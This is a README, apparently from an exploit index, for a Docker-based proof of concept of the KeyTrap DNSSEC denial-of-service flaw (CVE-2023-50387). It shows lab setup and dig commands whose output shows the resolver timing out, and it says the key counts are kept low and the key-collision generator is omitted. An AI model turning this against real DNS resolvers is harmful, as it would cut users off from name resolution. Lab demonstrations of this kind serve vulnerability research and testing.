Share
## https://sploitus.com/exploit?id=BB688FBF-CEE2-5DD1-8561-8F76501DE2D4
# CVE-2023-50387
KeyTrap in DNS (CVE-2023-50387)

This repository is for educational purposes.
The number of keys and signatures has been intentionally kept low to prevent their use in actual attacks, and a script for generating colliding keys are not included.

## Test

![network](imgs/network.png)

### Setting up the PoC environment

```
$ docker compose up --build
```

### Confirming DNSSEC works

```
$ docker compose exec -it attacker dig @10.10.0.3 a.a.test

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44249
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;a.a.test.                      IN      A

;; ANSWER SECTION:
a.a.test.               86400   IN      A       10.10.0.4

;; Query time: 30 msec
;; SERVER: 10.10.0.3#53(10.10.0.3) (UDP)
;; WHEN: Sun Feb 18 22:01:01 UTC 2024
;; MSG SIZE  rcvd: 53
```

### Triggering KeyTrap

```sh
$ docker compose exec -it attacker dig @10.10.0.3 www.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 www.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
```

```sh
$ docker compose exec -it attacker dig @10.10.0.3 b.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
```

## References
- https://www.athene-center.de/en/keytrap